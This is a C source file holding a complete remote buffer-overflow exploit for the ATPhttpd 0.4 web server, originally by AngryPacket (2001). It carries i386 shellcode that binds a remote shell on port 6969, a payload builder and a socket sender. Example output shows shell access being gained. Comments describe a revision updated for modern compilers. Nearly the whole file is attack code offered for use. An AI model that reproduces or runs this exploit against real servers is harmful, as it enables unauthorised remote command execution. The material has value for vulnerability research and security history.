Proof of concept exploit for ATPhttpd 0.4 -- + methodic >> [http://methodic.angrypacket.com] -- - + Cannot find nsabackdoor.dll. Please reinstall Windows.
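/* remote exploit for ATPhttpd 0.4 */
/* $Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */
/* Another 31336++ codez from AngryPacket */
/*
 * "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
 * was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
 * source for the hell of it. Ran ye old perl Ax4000|nc and did some
 * gdb'n and noticed that it said the return address was 0x41414141.
 * Well that speaks for itself...
 *
 * - dmuz@angrypacket.com
 */
/*
 * developed and tested against OpenBSD. exploit creates a port-binding
 * shell on the remote machine on port 6969 with the uid of the server.
 * try offsets between 5000 and -5000 with increments of 100. -200 worked
 * like a charm for me.
 *
 * ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
 * [methodic@vulnhost] [~]$ nc localhost 6969
 * whoami
 * methodic
 * id
 * uid=1009(methodic) gid=1009(methodic)
 * ^C punt!
 *
 * mad thankz to vegac who helped me with a lame bug i was over looking
 */
/* this exploit code by methodic with a little from dmuz */

/*
 * Review notes on this (2001-era) proof of concept:
 *
 *  - Everything about the payload is 32-bit x86: the shellcode is i386
 *    machine code and the value written over the saved return address is
 *    four bytes wide. The original stored both in `long`, which on an LP64
 *    host (a) truncated the shellcode copy to four bytes, because strlen()
 *    stops at the zero upper half of the first 8-byte element, and (b) wrote
 *    eight bytes at a four-byte stride, running four bytes past the end of
 *    the payload buffer. This revision uses fixed-width types and bounded
 *    copies so the bytes on the wire are the same on any host.
 *  - The return address is guessed from the attacker's OWN stack pointer
 *    minus an offset. That only works when the attacker's process layout
 *    resembles the target's (same OS/arch/environment, no address
 *    randomisation); it was true of the author's OpenBSD/i386 box and is
 *    not a general technique.
 *  - The payload travels as a C string inside the request line, so a NUL
 *    byte in the return address cuts it short. The shellcode itself has no
 *    NUL bytes; the program now warns when the payload was truncated.
 *  - The shellcode words are emitted in host byte order; the original did
 *    the same, so a little-endian host is assumed.
 */

#define _POSIX_C_SOURCE 200809L /* getopt(), optarg, inet_pton(), ssize_t */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* 701 A's to own the EIP */
#define LEN 900            /* payload bytes: NOP sled + shellcode + return-address sled */
#define NOP 0x90
#define REQ_LEN (LEN + 20) /* "GET " + payload + " HTTP/1.0\r\n\r\n" + NUL fits in this */
#define NOP_LEN ((LEN / 2) - 100) /* 350 bytes of sled before the shellcode */
#define DEFAULT_PORT 80
#define BIND_PORT 6969     /* port the shellcode listens on; see shellcode[] */

/*
 * port binding shellcode (6969/tcp) by noir
 * i386 machine code stored as little-endian 32-bit words; 148 bytes,
 * contains no NUL bytes (which is what lets it survive strcpy-style copies).
 */
static const uint32_t shellcode[] = {
    0x4151c931, 0x51514151, 0x61b0c031, 0x078980cd,
    0x4f88c931, 0x0547c604, 0x084f8902, 0x0647c766,
    0x106a391b, 0x5004478d, 0x5050078b, 0x68b0c031,
    0x016a80cd, 0x5050078b, 0x6ab0c031, 0xc93180cd,
    0x078b5151, 0xc0315050, 0x80cd1eb0, 0xc9310789,
    0x50078b51, 0xb0c03150, 0x4180cd5a, 0x7503f983,
    0x5b23ebef, 0xc9311f89, 0x89074b88, 0x8d51044f,
    0x078b5007, 0xc0315050, 0x80cd3bb0, 0x5151c931,
    0x01b0c031, 0xd8e880cd, 0x2fffffff, 0x2f6e6962,
    0x90416873
};

int usage(char *progname);

/*
 * Return the current stack pointer. The exploit uses it as the base for the
 * target's return-address guess, so it is only meaningful when the attacker
 * runs on the same 32-bit x86 layout as the target. The original read %esp
 * via a bare asm statement and fell off the end of the function, which is
 * undefined behaviour; this form returns the value explicitly.
 */
static unsigned long get_sp(void)
{
    unsigned long sp;
#if defined(__i386__)
    __asm__ volatile ("movl %%esp, %0" : "=r"(sp));
#elif defined(__x86_64__)
    __asm__ volatile ("movq %%rsp, %0" : "=r"(sp));
#else
    /* Not x86: the address of a local is the closest portable approximation. */
    sp = (unsigned long)(uintptr_t)&sp;
#endif
    return sp;
}

/*
 * Parse a decimal integer option strictly (no trailing junk, no overflow);
 * on bad input print the offending text and exit through usage().
 */
static long parse_num(const char *text, char *progname)
{
    char *end;
    long value;

    errno = 0;
    value = strtol(text, &end, 10);
    if (end == text || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, " + bad number: %s\n", text);
        usage(progname);
    }
    return value;
}

/*
 * Lay out the LEN-byte payload:
 *   [0, NOP_LEN)                       NOP sled
 *   [NOP_LEN, NOP_LEN + sizeof shellcode) shellcode
 *   the rest                           repeated 32-bit return address
 *                                      (this is what lands on the saved EIP)
 * The final byte is forced to NUL so the buffer is a C string for the
 * request builder. retaddr is copied in host byte order, exactly as before.
 */
static void build_payload(unsigned char *payload, uint32_t retaddr)
{
    size_t i;

    /* Return-address sled over the whole buffer (LEN is a multiple of 4). */
    for (i = 0; i + sizeof retaddr <= LEN; i += sizeof retaddr)
        memcpy(payload + i, &retaddr, sizeof retaddr);

    /* NOP sled in front, then the shellcode; 350 + 148 < 900 so it fits. */
    memset(payload, NOP, NOP_LEN);
    memcpy(payload + NOP_LEN, shellcode, sizeof shellcode);

    payload[LEN - 1] = '\0';
}

/*
 * Send the whole buffer, retrying on short writes and EINTR.
 * Returns 0 on success, -1 with errno set on failure.
 */
static int send_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = send(fd, buf, len, 0);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Entry point: parse -h/-p/-o, connect to the target, build the overflowing
 * GET request and send it. Exit status is 0 once the request was sent,
 * 1 on any socket or argument error.
 */
int main(int argc, char *argv[])
{
    int sockfd = -1, ch;
    int port = 0;
    long offset = 0, p;
    uint32_t retaddr;
    char *host = NULL;
    unsigned char payload[LEN];
    char http_request[REQ_LEN];
    struct sockaddr_in s;
    int reqlen;

    while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
        switch (ch) {
        case 'h':
            host = optarg;
            break;
        case 'p':
            /* 0 keeps the default below; anything else must be a real port. */
            p = parse_num(optarg, argv[0]);
            if (p < 0 || p > 65535) {
                fprintf(stderr, " + port out of range: %ld\n", p);
                usage(argv[0]);
            }
            port = (int)p;
            break;
        case 'o':
            offset = parse_num(optarg, argv[0]);
            break;
        default:
            usage(argv[0]);
        }
    }

    printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");

    if (!host) {
        usage(argv[0]);
    }
    if (!port) {
        port = DEFAULT_PORT;
    }

    /* setup socket structure */
    memset(&s, 0, sizeof s);
    s.sin_family = AF_INET;
    s.sin_port = htons((uint16_t)port);
    /* inet_pton() reports a malformed address; the old inet_addr() call did not. */
    if (inet_pton(AF_INET, host, &s.sin_addr) != 1) {
        fprintf(stderr, " + bad target address: %s\n", host);
        return 1;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror(" + socket");
        exit(1);
    }
    if (connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
        perror(" + connect");
        close(sockfd);
        exit(1);
    }

    /* build c0dez.. */
    /* unsigned arithmetic so a negative offset wraps the same way as before;
     * the target's return address is 32 bits wide, hence the truncation. */
    retaddr = (uint32_t)(get_sp() - (unsigned long)offset);
    printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n",
           (unsigned long)retaddr, offset);
    build_payload(payload, retaddr);

    /* A NUL byte in retaddr silently shortens the string-based request. */
    if (strlen((const char *)payload) != LEN - 1) {
        fprintf(stderr, " + warning: payload contains a NUL byte (retaddr 0x%lx);"
                        " the request will be truncated\n",
                (unsigned long)retaddr);
    }

    reqlen = snprintf(http_request, sizeof http_request,
                      "GET %s HTTP/1.0\r\n\r\n", (const char *)payload);
    if (reqlen < 0 || (size_t)reqlen >= sizeof http_request) {
        fprintf(stderr, " + request does not fit in %d bytes\n", REQ_LEN);
        close(sockfd);
        return 1;
    }

    printf(" + sending payload to <%s> on port [%d].. ", host, port);
    fflush(stdout);
    if (send_all(sockfd, http_request, (size_t)reqlen) == -1) {
        perror(" + send");
        close(sockfd);
        return 1;
    }
    printf("done\n");
    close(sockfd);

    printf(" + now connect to port %d on <%s> (be good!)\n", BIND_PORT, host);
    printf(">> visit http://sec.angrypacket.com for more security tools\n");
    return 0;
}

/*
 * Print the command-line synopsis and exit. Declared before main() so it is
 * no longer an implicit declaration. Exits non-zero: reaching usage() means
 * an argument was missing or malformed, which is an error for scripts.
 * Never returns; the int return type is kept for the existing signature.
 */
int usage(char *progname)
{
    fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o <offset>\n", progname);
    exit(1);
}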